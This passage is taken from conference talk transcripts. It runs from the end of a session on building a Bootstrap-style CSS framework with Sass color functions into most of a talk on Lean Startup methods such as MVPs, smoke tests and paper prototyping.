abstracting some of these commonalities within your application. 
So if you're interested in some of that, Polymer Project is definitely something to check out. I only have a few minutes left and I want to see if we can get some time for questions. But I wanted to briefly touch on visual style as well, because I think I'd be remiss if, after dissing Bootstrap's visual design earlier, I just left you guys hanging with no additional resources for some of those. So some of the sites that I normally use for finding inspiration on visual design and stuff like that: one of them is web font collections. So Google has one. Adobe recently, I don't know if recently, Adobe partnered with Typekit to release some of these Adobe Edge Web Fonts. There's another one called Brick.im, I believe. A lot of different web fonts. This one is especially nice. The tool that allows you to select the different web fonts for use is fairly robust and pretty nice. And a great way to look for inspiration on using different typefaces and stuff for your designs. The other one, and one that I'd love to demo if I had some time, if I don't get to it, come talk to me afterward because this is a pretty cool tool. It's also from Adobe, called Kuler. I'm not entirely sure how to pronounce it. But it allows you to create color schemes based off of maybe photographs or just the color wheel. So if you're looking to just find some pretty good colors to use for your designs, this is a great place to start. If you're looking for something a little more constrained, maybe less free form than Adobe, check out this site DesignSeeds.com. Every day or every couple of days, they'll take photographs and pull out key colors from those photographs and release them as color collections. These things are amazing. This one was actually from this morning. And it's just a great little example of what they've got there and some amazing colors, really, really pretty stuff that they've got there. 
And also the photography is pretty good too, so if you just like photographs, they've got some good ones there. And the last thing that I wanted to talk about is an additional feature of Sass that I found very useful with global variables and colors and so forth. So say that I want to build an entire site off of one or two particular colors. Well, there's a couple of approaches that I like to take. One is kind of abstracting some of these colors. So you'll notice that we have our color called olive, but we also have a headings variable that's assigned the same value as olive. And this is so that if I ever wanted to change the base color, I don't have to go do a find and replace for olive. I can just change it in this one place and then all of our headings now have the new color. So having that light little level of abstraction is a great way of keeping your design independent of some of the color choices that you use. But there's also some interesting CSS functions that allow you to do some cool things as well. So this is, again, a Sass feature, but I believe Less and many other CSS preprocessors have it. What I'm doing is calling this lighten function and then passing in this normal headings color, saying lighten it up by about 10% or so. And so the resulting color is actually quite a bit lighter and I can use that elsewhere in my site. What's more is if I wanted to change the base color, I could do that and everything would sort of cascade, if you will, pun intended, to all of the different colors that I've defined. There are a number of these different color functions. There's lighten and darken. And my favorite is mix, where you can actually mix multiple colors together. Check out the link that I mentioned earlier and there's a number of these functions that are available there. So with that, I want to go ahead and wrap up. Like I said, I wanted to leave a couple of minutes for questions. 
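The color abstraction and functions described above look something like this in SCSS; the exact hex values are assumptions:

```scss
$olive: #6b6b47;

// Role-based variable: change $headings (or $olive itself) in one
// place and every heading follows — no find-and-replace needed.
$headings: $olive;

h1, h2, h3 {
  color: $headings;
  // lighten() returns a color about 10% lighter than the base.
  border-bottom: 1px solid lighten($headings, 10%);
}

// mix() blends two colors — here 60% olive, 40% white.
$accent: mix($olive, #fff, 60%);
```

Swapping the value of `$olive` cascades through `$headings`, the lightened border, and the mixed accent all at once.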
If you'd like to look at the slides or the code, it's these two. I told you there's a lot of NDC BB links. So dash slides are these slides and dash code is the code example. It's on GitHub. If you'd like to submit a pull request or something, if you found a more interesting way of doing some of this stuff with maybe even less CSS, please, I'd love to hear it. The last thing that I'll say is please remember the feedback. The conference organizers appreciate knowing how badly I sucked today. So if you'd, just while you're walking out, just drop a card to the appropriate color. But I appreciate all of your time. We've got a, like I said, 30 seconds or so for questions. And I know everybody's really interested in getting to lunch. So if you want to find me around lunch, we can continue chatting there. And then don't forget the hashtag better bootstrap if you'd like to continue the discussion or just tweet at me directly at Tim G. Thomas. And I very much appreciate your time and hope you have a great rest of the conference. So you're dismissed to lunch. But if anyone would like to stay for questions, I'm up here. Thanks.
The influence of Twitter's Bootstrap framework is undeniable, but it brings with it a steep learning curve and a great many features the average web app simply doesn't need. In this session, you'll learn how easy it is to build your own web framework from the ground up, so you can tailor it to your—and only your—needs. We'll start with a solid CSS foundation, add on some component scaffolding for your most common use cases, and top it off by discussing how to share your new web framework with your team. Grab your hard hat and come learn how to build a better Bootstrap!
10.5446/50646 (DOI)
Let me start very, very simply. Why are you here? Are you here to learn about Lean Startup? What do you know about Lean Startup? Why are you here? Learn about Lean Startup? What about you guys? Same? Okay, what do you know about Lean Startup so far? Nothing. Awesome. Who knows? I've heard the words, build, measure, learn. Sounds interesting. Most of you. How many people have read the book? How many of you have done something in terms of Lean Startup? I've implemented a smoke test or a concierge test, something like this. Okay, not so many of you. All right. Sounds good. Let me ask another couple of questions. How many of you are in a startup right now or planning to do a startup? Okay, about half of you. How many are in a corporation of some type? Okay. How many of you would like to be doing innovation inside that corporation while keeping your nice salaries? Okay, most of you. Just checking. So that's good. I have no bias towards startup. I've been in Silicon Valley for the past five years, so I'm surrounded by startup people who always just say, yeah, quit your job and do a startup. I don't think that's necessary. We're seeing more and more corporations these days doing really innovative things, creating accelerator programs, creating innovative products within their company. And it's actually quite refreshing to see. It makes me feel like there's hope for the future. Okay, let's get to the talk. I am going to ask you guys to play part of the role here. So my role here as the speaker is to tell you what I see as the truth, what I've seen around me in corporations and startups. Your role here is to call me on my bullshit. Okay? If I say something that doesn't make sense, it's your responsibility to stand up and ask me a question about that or tell me why I'm wrong. Agreed? Yes? Okay, good. So my name is Tristan Kromer. I live in Silicon Valley. 
I spend about half of my time working with corporate programs encouraging entrepreneurship, teaching them how to move as quickly as a startup. I spend the rest of my time. That's the part where I get paid. The part where I don't get paid is working with startups, which is much more fun to me, but startups as you all know have absolutely no money. So we do it purely just because it's entertaining and enjoyable. I run an organization called Lean Startup Circle. It's a grassroots decentralized organization that operates in about 80, over 80 cities around the world, including, I think there is one here in Oslo, Silicon Valley, obviously, as far as Tokyo, Beijing. We even have one in Ramallah, Palestine, and five in Saudi Arabia, which is crazy to me that there are actually more groups in Saudi Arabia than there are in Germany. So that's been very exciting to me to hear that everybody is trying to start innovate. So since most people here are a little bit unfamiliar with Lean Startup, let me start kind of with the basics here. What is a startup? What's the job of a startup? That's not a rhetorical question. What's a startup? A business that's just starting, but you're not allowed to use the same word as in the word that you're trying to define. What's the job of a startup? What's the purpose? Startup is a business where there's a lot of risk. I buy that. That sounds good. Any other comments, additions? Create customers. That's a good definition, too. I like that one. That's really good. All of those sound good to me. I like that. What's important to realize is that the job of the startup is not this, right? This is fun. This is the Norwegian Developers Conference, so I assume most of us here are developers. This is what I enjoy to do. I'm not a very good developer, but I'm very happy, like, doodling away at two in the morning and trying to build something interesting. But this isn't the job of a startup. The startup is not there to produce code. 
The job of a startup is also not to tinker with things. We've got a lot of hardware startups. We've got robotic startups. The job of a startup is not to build things. Similarly, if you're a business person, the job of a startup is not to create a business plan. This is not functional. This does not create customers, as you said. The job of a startup is not to do financial modeling. The job of a startup is not, if you're a designer, to create pixels. Having a pretty web page is not the job of a startup. The job of a startup is not to build a product, but to understand and create a business model, a sustainable business model that actually will drive a product to customers. Product has no value unless somebody actually wants it, period. So the job of a startup is not to produce product, but to produce a business model that can sustain itself. Startups also have one very familiar characteristic. As you said, somebody said they were just starting up. They have a lot of risk. As a startup, you have a certain amount of time before you run out of money. This is a finite window to create a business model. The standard definition of this is a runway. Runway is very simple. It's the amount of cash you have on hand divided by your burn rate, how much you spend, and that equals your runway, how much time you have before you go bankrupt. So you have a certain amount of time. You have the amount of patience that an investor or your business unit manager, if you're inside a corporation, gives you before they shut you down. Similarly, this can also be the amount of time that you have before your mom gets tired of you working in the guest room and kicks you out of the house. So that's your runway. The only issue with this for a startup is that time does not equal learning. 
If your job as a startup is to produce a business model, then the amount of time you spend coding or writing a business plan or producing financial projections five years in the future has absolutely nothing to do with you learning about your market, learning about your business model. Time does not equal learning. What does equal learning is iterations. We learn about the product by actually getting feedback from customers. If our job is to create customers, then any amount of building that we do, no matter how good your code is, no matter how skillful you are, does not mean anything. Doesn't help you create a business. What helps you create a business is building something, measuring to see whether the customer likes that, whether the customer is willing to pay anything, and then getting feedback on that. So this is the bumper sticker of Lean Startup. If nobody knows anything about Lean Startup, this is generally what they've seen. Have you guys seen this before? Build, measure, learn? It's pretty common, right? And this is nothing new. This has existed for thousands of years. Designers call this think, make, check. The American Air Force calls this OODA: Observe, Orient, Decide, and Act. Deming, this business guy, calls it Plan, Do, Check, Act, something like this. But the point of this is not just to build something and then learn from something, it's to go as fast as possible. So how long does it take you guys to go to market? Let's hear from the corporate guys. How long does it take you from the point where you have an idea to get it to customers and get feedback on it? How long? There were a lot of corporate hands over here. How long? How much? Two months and still counting. Two months and still counting. That's actually not bad. Normally I hear like nine to 12 months. So recently I've been working with a corporation in Switzerland and they're generally taking nine to 12 months just to build it. 
And then it's handed over to the poor marketing department who's like, what's this? Why did we build this? What is the purpose of this? Who are the customers? We're not entirely sure. So yeah, typically quite a long time. What we're seeing is we have things like, let me rephrase, the important part here is going quickly around this cycle. So we can take a company and we can give them $2 million and say it's going to cost you $1 million a year and it's going to take you one year to build a product. How many chances do you have to learn if your product is good or not? Also not a rhetorical question. How many chances? Just one. Were you at my talk yesterday? No. That's a good answer. Just one. Normally people say two, but at the end of the second year you're bankrupt. Even if you launch at that point, you have no chance to learn anything. So you have one chance. Nowadays we're building products much faster. If we can take a product with a one month runway and run one day iterations, so actually build something, not the entire thing, but build something that gives us market feedback in one day, we actually have 27, 28, 29 chances to learn something. So a one month runway beats a one year or two year runway every single time. And we have companies doing this now. Who here has been to a Startup Weekend? Just one person. Really? Okay. Everybody turn around, get this guy's phone number. How long did it take you to build your prototype at Startup Weekend? Couple of hours. And this is getting more and more typical. So David Weekly built PBwiki, which became PBworks, a very successful company. He built it in an all nighter. That was his first version. Most Startup Weekend companies generally take anywhere up to 54 hours to build their product and actually get feedback from customers. This is the speed that we're going now. And the developer tools that we have access to are such that even a business person can hack together a prototype amazingly quickly. 
You guys are becoming somewhat obsolete. You're building yourself out of a job. I started coding in high school. I ran a bulletin board system under Makos, a language whose acronym I don't even remember anymore. The only thing I remember is that it stood for "more of a crappy operating system." I stopped coding for 15 years because I had a choice: either I really focus on coding or I go play my guitar. I chose to go play my guitar for a few years. I stopped coding. 15 years later, I was traveling abroad, I moved back to Silicon Valley, and I wanted to do a startup. I was like, well, I might as well learn some code. I got a friend to teach me Ruby on Rails. Two months later, I was building my own prototypes. Somebody who hadn't coded at all can build a fully fledged prototype in a matter of days or weeks. All of this stuff is becoming quickly commoditized, unfortunately. And sure, we still have some skills that are valuable, like how to scale. You certainly can't do something as impressive as Twitter in Ruby on Rails alone. You might have to throw a little Scala or Java in there. But ultimately, our ability to deliver value, if we want to create a startup, is not just in coding anymore. I'm going to tell you some other stories about some of the people who are hacking together prototypes and actually earning revenue from day one without any substantial amount of effort or coding. So back to my narrative here. Cash on hand divided by your burn rate does not equal your runway. What matters is the number of iterations you have. Because ultimately, the time you spend building stuff increases the risk (bless you) that you're actually building the wrong stuff. It's a very linear graph. The more time you spend building stuff, the greater the chance that you're actually building something that nobody cares about. What mitigates this risk? And this is the risk, right?
If you screw up, you're back to square one, starting from zero. But what matters here is that we can now break up your big idea into tons of little small ideas, systematically testing each part of your business model. And if you do make a mistake, it's not such a big deal. You maybe lose a day or a week or a month, not an entire year of your life. And of course, the general problem with the build-it-and-they-will-come methodology is what we all know as feature creep, both within and outside of a corporation. We all get new ideas. We're creative people. We come up with new ideas. And the risk as we go on and proceed is that our feature creep basically goes to infinity and we never, ever, ever, ever release. We just continually try to be perfect. And because we don't want to be embarrassed by putting out something that's not perfect, because it's our reputation, we're afraid. We're afraid that somebody won't like our product, that somebody will tell us that our baby is ugly. We hide it away and never release it. So what's the alternative? The alternative nowadays is something that's become kind of a horrible buzzword. Everybody knows MVP, minimum viable product. What's an MVP? What's the definition of an MVP? The smallest thing you can build to prove an idea. I like that. The definition I like even more is: an overhyped buzzword that means nothing. That's actually my preferred definition nowadays. Most people have their own definition. The one somebody gave me last night was: a prototype. It's just a prototype. That's not what it is. This is not an MVP. It's not this incredibly complicated thing built to do an incredibly simple task. An MVP is exactly as you say. Eric Ries defines an MVP as that version of a new product which allows a team to collect the maximum amount of validated learning about customers with the least effort. So it's something like this. This is a real company putting out an MVP.
I actually don't like this MVP entirely, but it's pretty good for what it is. It's a very good test. What we have here is: notify me when LSAT games become available. Do you guys know what the LSAT is? The LSAT is a test that you have to take to get into law school, like the GMAT or GRE in the United States. So what do you think this company does? Shout it out. Huh? It's a mailing list. Well, why would you sign up for this? What is the value proposition of this? Great. What do you think the thing is that you're signing up for? No idea. A study guide. A study guide. Games, yeah. Studying, but more fun. This is a very simple page, right? How long would it take you to build this? An hour, 10 minutes? And this is a real company. This is Grockit. This was the first version of their product. And it is just a landing page. There's no functionality behind this. This is their last version. And you can see in the upper right there, it's been acquired for a very large sum of money. The entrepreneur in charge of this is well onto his next product. And notice something else about this. This is their latest version of the product. The home page, the functionality, is basically identical. Sign up. They created this page just to see if anybody was interested at all. There was no functionality behind this. This was just created to see if it was even worth building the product. This is, of course, very common nowadays. Here's another one. This is called Data Shelves. This was their MVP. This is a little bit more value-delivering. What does this one do? What does this company offer? Let's take a random guess. Market statistics. What do you think happens when you sign up? They get your email. That is correct. But the next page is a pricing page. They ask you a simple question on the next page: would you like the answer to your market research question? In seven days, give us $25. In three days, give us $50. Or in 24 hours, give us $100.
And this company had a vision of a machine learning algorithm which would go through the web and pull out only the information that you wanted, kind of like Wolfram Alpha nowadays. But this was a while back. And then you select your pricing plan, you pay, and what happens? What do you think happens? Yeah, we'll get back to you. But you actually get an answer 24 hours later if you pay $100. How do you think they do that? Exactly. Manually. There's an intern sitting there googling stuff. That's their machine learning algorithm. That's it. It's called a Wizard of Oz test. And this is quite common. There was another company called Aardvark that did the exact same thing. It was two Google engineers who left Google and decided to compete with Google by building a search engine basically powered by human beings. Their idea was that there are some questions which can't be answered by Google. What's the best lobster in Maine? But if I could ask people from Maine, they'd be able to tell me. So this idea depends on a very large network effect, right? If I don't have anybody from Maine in my network on the website, then I can't answer this question. So they hacked it, the same way. They had three interns sitting there googling: what's the best lobster in Maine? And then they'd fake the answer until more and more people signed up. They were, of course, I think one and a half or two years later, reacquired by Google. And I believe they made at least $5 million each for those two years. So not bad for something mostly powered by humans at the beginning. And this is happening again and again and again. My favorite application, do you guys know CardMunch? Does that still exist here? No? CardMunch? CardMunch is an application which lets you take a photo of business cards and have them automatically imported into your address book, also powered by Mechanical Turk. Wonderful idea. There's another one, Click and Grow. This is an Estonian company.
And as you can see, they tried to raise $75,000 on Kickstarter for a product that did not exist yet. And they raised $625,000, funding their entire development effort. This was the second Kickstarter they did. These are all essentially smoke tests. They're a way of establishing demand before the product actually exists. The Wizard of Oz test actually determines if we're providing the right value. We can actually see whether or not the user really engages with our product, because ultimately the user doesn't really care if it's a machine learning algorithm or a human being at the back end. They care about the result. I don't really understand how my computer works. I don't know what chipset is in there, and I don't really care. It could be little elves. That's totally irrelevant to whether or not I get the value that I'm looking for. Here's another one. This is another page that takes, you know, a day to create. By the way, all of these prototypes obviously take very little time to create, with the possible exception of the last one, right? That one has a video, so it takes maybe a few days to create. Then there's this. Anybody want to tell me what this company is? What do you think this product does? What's the value proposition here? Everybody's staring blankly. Playlist. So yeah, most people say music. They actually had three different versions of this landing page with, like, different girls, different guys, all of them wearing headphones. It has nothing to do with music at all. It's a social news aggregator. This is what I would call a terrible MVP. This MVP sucks. I would agree with your previous assessment. This is just a mailing list. This is a way of harvesting email addresses. This is what happens when Lean Startup goes bad. When we just accept the buzzword and kind of, oh yeah, let's do a landing page test. That'll help us. We'll get early people to sign up to our product. But people signing up to this page have no interest in a social news aggregator.
The fact that they were able to optimize, through rapid A/B testing, a conversion rate of over 30% on this page, just by putting a good picture up, tells us nothing about the value proposition of that business. It's utterly useless. The only usefulness is, as you said, if they sell these email addresses. And in fact, this company shut down. They spent about six months building this social news aggregator and then determined that nobody actually wanted it, which is a pity because they're actually quite brilliant guys. They went on to do some other cool things, though. And this does not exist only in the realm of software. We have 3D printers now. We're able to rapidly develop hardware electronics. There's a gentleman in San Francisco who has a 3D printer for circuit boards now. Very clever guy. Built that entire thing from scratch. So we have products like this. Anybody know this product? Anybody familiar with it? The Apple I. A brilliant MVP. From the company that never puts out anything less than perfect, their original product was a wonderful, wonderful, wonderful MVP. It tested market demand for something. Now I'll tell you the one that to me is the most embarrassing from my perspective. There was a guy in Manchester, England named Amman. A very ambitious young guy, I believe he was about 21, just getting out of college. He had 1,000 British pounds to his name, just 1,000. And he said, I'm going to start a business. And he did what most business people in this case would do. He would go to you guys and say, will you please help me build my product? My product is a two-sided marketplace. What I want to do is connect musicians to content producers, people who have videos, people who have blogs, so that they can add the music to their blog or content and hopefully generate more money. That was his business idea. A two-sided market. And of course, you would say something like... who here gets pitched business ideas all the time?
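As an aside, the arithmetic behind a claim like "a conversion rate of over 30% through rapid A/B testing" is easy to sketch. The numbers below are hypothetical, not this company's data, and note that a statistically solid conversion difference still tells you nothing about whether the value proposition is real, which is exactly the trap described above:

```python
# Hypothetical A/B comparison for a landing-page smoke test.
# A "conversion" here means a visitor leaving an email address.
from math import sqrt

def z_score(conv_a, n_a, conv_b, n_b):
    """Two-proportion z-score; |z| > 1.96 is roughly 95% confidence
    that the two pages really convert at different rates."""
    p_a, p_b = conv_a / n_a, conv_b / n_b
    pooled = (conv_a + conv_b) / (n_a + n_b)          # pooled conversion rate
    se = sqrt(pooled * (1 - pooled) * (1 / n_a + 1 / n_b))  # standard error
    return (p_a - p_b) / se

# Variant A: 300 signups from 1000 visitors (30%); variant B: 220 from 1000 (22%).
z = z_score(300, 1000, 220, 1000)
print(z > 1.96)  # True: the difference is statistically real; the value prop may still be fake
```

The test needs both a numerator (signups) and a denominator (visitors), which is the same point made later about YouTube likes without view counts.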
What do you say to this? A huge network effect to overcome. Who else? Somebody there raised their hand. What do you say? You want to join my startup and do this? Yeah, that's pretty much the answer most people would give. It depends on the network. Who else raised their hand? I have a better idea. Excellent answer. Why on earth would you? You don't have any technical skills. You can't build anything. What do you add to this equation? Half of the people here said they were going to do a startup. We all have better ideas. What's there to prove that this person's idea is better than ours? So his response, of course, was: fuck you, I'm going to do it anyway. And he had a lot of, let's say, chutzpah. He had a lot of willpower to do this. So what he did is he took the unorthodox step of creating a website to help relax your dog. So you have a very small dog. It's very annoying. I will create a website that will help you calm that dog down. Anybody want to invest in this idea? No? With his 1,000 pounds, he hired some musicians that he knew and created a soundtrack. And he took a video of his small dog, or somebody else's small dog, I don't know whose dog it was, listening to the music and going to sleep. And he put this video up on YouTube, and at the end of the video it says: if you have this problem, if you have a dog that won't shut up, you can pay me $20 for the whole album and I'll send it to you. Or you can post a video of your dog calming down to this and link back to me. And of course, the video goes up like this, up and to the right. He winds up with 2,700,000 views of that video. He throws up a WordPress site. I think this is WordPress. Not very sophisticated. And you can tell his wonderful design skills here. Kind of blindingly purple. But I guess it is soothing. And he puts up relaxmydog.com. When I met him, he was making 5,000 British pounds a month. Again: a student, a 1,000-pound investment, no engineering talent whatsoever.
Making 5,000 British pounds a month. Just from this. And he puts up another couple of long-tail sites. His idea was: well, I want to create this two-sided network to help content producers make money from adding music to their content. If they can't make money by adding music in some way, well, then this is a terrible idea. So I'm going to prove that content producers can make money off of music by just doing that. I'm going to try and make money off of random music that I can hire out for. It's a little bit of a strange MVP. It's a very micro niche, clearly. But he put this up and was making 5,000 British pounds a month. He starts putting up other long-tail content sites using content that he's ostensibly outsourcing. Six months later, he's making 25,000 British pounds a month, which is not a bad salary. He couldn't get any venture capital investment, couldn't get a technical co-founder. After this, he's got VCs coming to him and he says: go away, I don't need your money. I have no use for it. I have revenue. He has a technical co-founder now, and he was applying to 500 Startups, I think. But I don't think he even needs to go in. He's got a perfectly valid business model so far, and he can take the next step of trying to actually automate that process. Can he put up sequentially many, many long-tail sites? In fact, I know somebody who does this with applications: they just throw up generic content from the web, prepackage it into Android apps, and have an automated build system that essentially lets them completely spam the app store, the Google app store or Google Play, whatever it's called. So this is not an atypical thing to do. We're being killed by business guys who are willing to just hack something together really quickly that has just enough value, just enough to make people happy, just enough to deliver some element of value that people are willing to pay for or exchange data for.
And most of the applications we see out there are not incredibly sophisticated. They're incredibly niche. This sort of thing is becoming more and more popular. There's another company I know down in Mexico. They had another idea, and actually a great team of engineers. They wanted to connect musicians with venues and music promoters in Mexico. And the problem they understood from the venues was that the venues didn't know which bands would be popular or not. So if you have a band from Oslo and they want to come over to Mexico, the venue says no. I have no idea who you are. I don't know if the music will be compatible with the local culture here. Their idea was: well, we can take that music from Oslo and do some blind tests. Forget about marketing. We're not going to market the band. That's too expensive. What we're going to do is just try to test whether the market likes this or not before investing a lot of money in marketing. So if this was your project, what would you do? How would you test this? How would you try to establish whether a band from Oslo will do well in Mexico? Take a random guess. There's no wrong answer. What? Play the music. To who? To Mexico. To Mexico. In clubs? That's good. That would be one way. We could just put it on and see if anybody dances. If you've got the right music. Any other ideas? What did you say? Look at YouTube videos? Targeted ads to a YouTube video, see how many likes it gets. I think that's good. The one problem there is that, as far as I know, it's difficult to see page views on YouTube. So we don't have the denominator that we need to compute a conversion rate. In the club, actually, we can see how many people are in the room. So we could, in theory, see that. But it's a little bit more difficult.
One of the most creative ways I heard to test this was somebody suggesting actually putting speakers on top of a car and driving down the street with a big phone number on the side that says: if you want us to go away, text this number; if you'd like us to stick around and bring this band here, text this number. Which I thought was brilliant. I would love to see that happen. Probably they'd get arrested, but it would certainly be fun. So this company, they had good engineers, so it was certainly easy for them to build something, and they decided they did want to build something. They wanted to build a website where essentially you would go and listen to a clip of this music and say: yes, I like this; no, I don't like this. It would be blind, like a Coke versus Pepsi taste test. You'd just get an honest reaction as to whether the music was good or bad without any marketing or branding skewing your results. And they could build this. It's pretty simple to build. You don't need a huge music library. You don't need access to iTunes or anything like that. You don't need to make any record deals. You can just pull music from independent artists. But they decided to test their actual website first. And this was their prototype. A piece of paper. It's actually two pieces of paper. Sorry, my bad. It's one piece of paper sitting on top of another piece of paper. That actually turns out to be great, because you can change the interface really quickly. They went to coffee shops and they said: hey, we're entrepreneurs, we've got this idea. I see your coffee is running low. We'll buy you a cup of coffee if you check out this prototype and see how it works. A person would generally say: yes, why not? I'm sitting in a coffee shop. I'm enjoying my coffee. I like to help out young entrepreneurs. I'll play with your prototype. And what they wanted to see was: will somebody listen to just one or two songs and then say, this is not interesting?
Or will they get enough engagement on their prototype to justify actually building something? And so they put this in front of people and they said: treat this as an iPad. It's just an iPad. If you want to click a button, just press the button. And I'm going to give you my headphones. And when they hit play, I hit play. And they discovered some very interesting things. They discovered, okay, first of all, people were willing to do that, but that's probably a false positive bias because you're there asking them to. Their big concern was this: people would need to listen to maybe a minute of each song, and they'd need people to rank at least five or ten songs, otherwise they wouldn't get enough data. This is a big data play, essentially. They needed people to listen to a lot of different songs and say what they liked and didn't like. Otherwise, they'd have to recruit so many people to listen to songs that the whole thing would be unfeasible. So they needed a massive amount of engagement. And they weren't sure people would be willing to listen to a minute of this band, a minute of that band, a minute of another band. What they found out with this prototype was that people immediately started hitting the next button within three seconds if they didn't like the music. If they liked the music, more like 10 seconds. That's it. That's how long it took people to figure out if they liked or didn't like the music. And people loved doing this. They were sitting there for longer than five minutes. They kept pressing through. They were like: this is really cool. I like this. This is awesome. What's this band? People would pick a band, and they'd put another piece of paper there: oh, this is what happens. This is what happens. This is what happens. And that person would leave with a list of new music that they liked. And this was their prototype.
And then once they'd established the basic user behavior, they said: okay, but maybe we're just fooling ourselves. Let's actually build the website and see if that user behavior still holds. And they built a prototype, a real prototype, a working thing. They built this. And how long does this take to build? You're engineers, how long? I mean, clearly the design took a few months, but how long? An hour. Yeah, maybe something like that. Certainly less than a day. And it has all the basic functionality that one would expect. And if you were thinking longer than an hour while doing that mental calculation, remember: you don't need a big database of songs. You can just hard-code one or two songs in there, or five or ten later. No need to have a massive library. You could do this entire site with just JavaScript, I think, JavaScript and a little HTML. I think they built it in Rails, but, you know. And then they did their next version and their next version. And these builds are taking days. Days or hours, not weeks, not months. And it's slowly evolving. And the behavior they're finding on this website is almost identical to the behavior on their paper prototype. Almost identical. They're getting the same level of engagement, which is fantastic. They're not spending much money. They're just sharing it with friends, who share it with their friends, who share it with their friends. They're not seeing quite the engagement they want, but they're getting enough to validate their initial assumption and continue building. And they keep building, and yes, things are broken and images aren't showing up, but that's okay. They keep evolving and iterating the design, and they get something that's actually starting to look quite fancy. And they wind up with something like this. What do you guys think of this version? Better design or worse design? Better. Better. Huh? Starting to get bloated. Starting to get bloated.
That would be my guess as well. This version actually behaves worse than the previous versions. It is too bloated. The design is too cluttered. I'm not sure what I should do on this page. Their last version? It's pretty clear what you should do on this page. The bounce rate on this page: very, very low. There's only one thing you should do, and you understand what it is. And the thing is, you could argue they should have just built this site from the get-go. But if they'd started with the bloated version, they would have found their engagement numbers low and concluded the idea was bad. Don't bother. The simple version wins. Now, certainly, that's not the case in all industries. You don't want an MVP of a cure for cancer or a malaria vaccine. That's not a good idea. But for most things, this works very, very well. A nice, targeted, clear value proposition that's easily understood by the user and that produces value. There was another story that Eric Ries told me, which I thought was wonderful. He was the CTO or VP of engineering or whatever title they wanted to assign themselves at a company called IMVU. Anybody know IMVU? Anybody ever used IMVU? No? Not my sort of site either. It's like a virtual world chat. So I'll create a virtual avatar, you'll create a virtual avatar, and my virtual avatar will go over and chat with your virtual avatar. I don't really understand why anybody would want to do that, but people apparently do in droves. And they had to implement these avatars moving around, obviously. If I want to go and talk to your avatar, well, we have to calculate how my avatar goes around the podium and gets to you to talk to you. And that's non-trivial, right? You can do it, but it will take a little while. And in the prioritization of their agile development process, they were like: let's just put it out broken and we'll fix that next week.
We'll just make it so that if I click over there, poof, my avatar magically appears over there. And we know that we'll get complaints and a lot of user feedback, but that's okay, we'll fix it later. We're an early-stage startup; if we lose a few customers, it's not a big deal. And something very interesting happens. They do start getting comments from customers. And the comments from customers are: this is awesome. Just awesome. Your avatars are more technologically sophisticated than all the other avatars in virtual worlds. Superior technology. Why? Why do you think they're technologically superior to all other avatars? What? They're faster. Yeah, they can teleport. Your avatars can teleport. All the other avatars have to walk from place to place. That's what the user thought. And I mean, that's true, right? If you could teleport, why would you ever bother walking? I like to walk in the park. It's very lovely here in Oslo, except maybe today. But I would teleport back to San Francisco, grab a sandwich, and come back in a second. So they stumbled upon a technologically simpler solution, saved themselves a lot of time, and it actually proved to be a great value proposition to the customer, all by choosing what not to build. So this is kind of the experimentation approach. Now, Lean Startup. Again, I would normally skip this, but I think it's worth restating. There are a lot of methodologies, but Lean Startup is a principled approach as far as I'm concerned. It has nothing to do with filling out a Business Model Canvas or a Lean Canvas or running a smoke test. That is all nonsense. Just like with agile: you don't have to do Scrum. It is not required. Doing a daily stand-up does not make you agile. Companies adopt Scrum and just think: well, we're all doing stand-ups, that means we're agile. That's ridiculous. That's just ridiculous.
If it's a small team and we all know what we're doing, we don't even need to do a daily stand-up. We're all sitting right next to each other. It's not required. So Lean Startup is getting to be like that. There's a confusion between methodologies and principles. If you read the original Agile Manifesto, the one that's actually signed by Kent Beck and company, that's really the spirit of Lean. It's about producing value for customers, creating customers, creating customer value. Not just capturing value, but creating it. How can we build something that actually has value for customers? As far as I'm concerned, it starts with only three principles. Three principles to Lean. Number one: I don't know. You have to start by saying, I don't know. If you think you know everything, if you think you know exactly what features you need to build, if you think you know how to build it, and you think you know how the customer is going to react, and you think you know how much they're going to pay you, don't do this. It's a waste of your time. You don't have to do Lean Startup. You can go and build something for a year. I don't care. If you have the money and you have the time, wonderful. Go for it. I like to build things. It's enjoyable. I learn new tips, tricks, languages. That's fun. That's great. But that's not building a business. To build a business, you have to start with the idea of: I don't know. And only when you can start with that level of humility can you actually choose to learn something. If you think you know everything, you will never learn anything. The second principle is perspective. You need to get perspective on your ideas. This is actually kind of an informal rule of Lean Startup as far as I'm concerned. Perspective from customers. Perspective from your friends. Your friends can tell you where your blind spots are. You cannot. You can never see your own blind spots.
When you lose your glasses, where are they? Don't know? Yeah, of course. You can't see. When you lose your glasses, where are they? Seriously. You never lose them? Good for you. When I lose my glasses, they're generally either on top of my head or, worse, I'm actually wearing them. Which is something that's very foolish when somebody points it out to me. So we're not aware of our own blind spots. It's hard to see past our own perspectives. So have somebody else to bounce ideas off of, without defending our business idea. We're not trying to win the argument. We're just trying to get perspective. Somebody asks you: I don't understand, who's your customer? Or: what's your value proposition? We shouldn't take that as an affront. We should take that as: maybe it's not clear. Maybe I don't understand my customer. Maybe I need to research that. Maybe I need to go talk to human beings and discover what they actually want. So get perspective. It also means qualitative versus quantitative data. If you have quantitative data, that's awesome. Quantitative data rules. But if you don't know why people are clicking the button, then it doesn't help you. You need qualitative data and quantitative data. If you've got quant, go for qual. If you've got qual, go for quant. So: perspective. Getting as many data points and running as many experiments to validate your assumptions as possible tells you you're doing something. And the last thing is, of course, the bumper sticker: build, measure, learn. But the important thing to remember about this is that it's not about build, measure, learn. It's about the speed at which you can go through this cycle. You have to go through this cycle as fast as possible. And the other corollary is that this loop is actually backwards. It's written twice in the Lean Startup book, if you choose to read it, but this loop is completely backwards.
If you want to learn something, you don't start by building something randomly, throwing it against the wall, and seeing what works. That's called spaghetti testing: throw it against the wall and see what sticks. We like to go backwards. We like to figure out: what do we want to learn? What's our hypothesis? How are we going to measure that? What information would actually change our mind? What information would tell us that this idea is terrible and we shouldn't do it? If you can identify what data would convince you that this is a bad idea and you should stop what you're doing and go back and get a job, now you're onto something. Now you can go and build an experiment to gather that data. So this has to go backwards before it can go forwards. You've got to create a hypothesis, a metric, an experiment. And then we can talk about build, measure, learn. I'm swiftly running out of time, so we can talk about this later; it's not really that critical right now. Lean Startup is being adopted all over the world, in places like Ramallah in Palestine, Saudi Arabia, and Beijing in China. Everybody's at a different point of adoption here. Anybody know this shape? The Gartner hype cycle, correct. All technology tends to go through this, where we get really excited about Node.js, and then we realize Node.js is crap, and then we realize that, oh wait, you can do some really cool things with Node.js. Lean Startup is kind of the same way. From what I've seen so far in Norway, we're very much in the buzzword phase: of course, if you're not building an MVP, you're doing something stupid. It'll probably get worse before it gets better, at least in 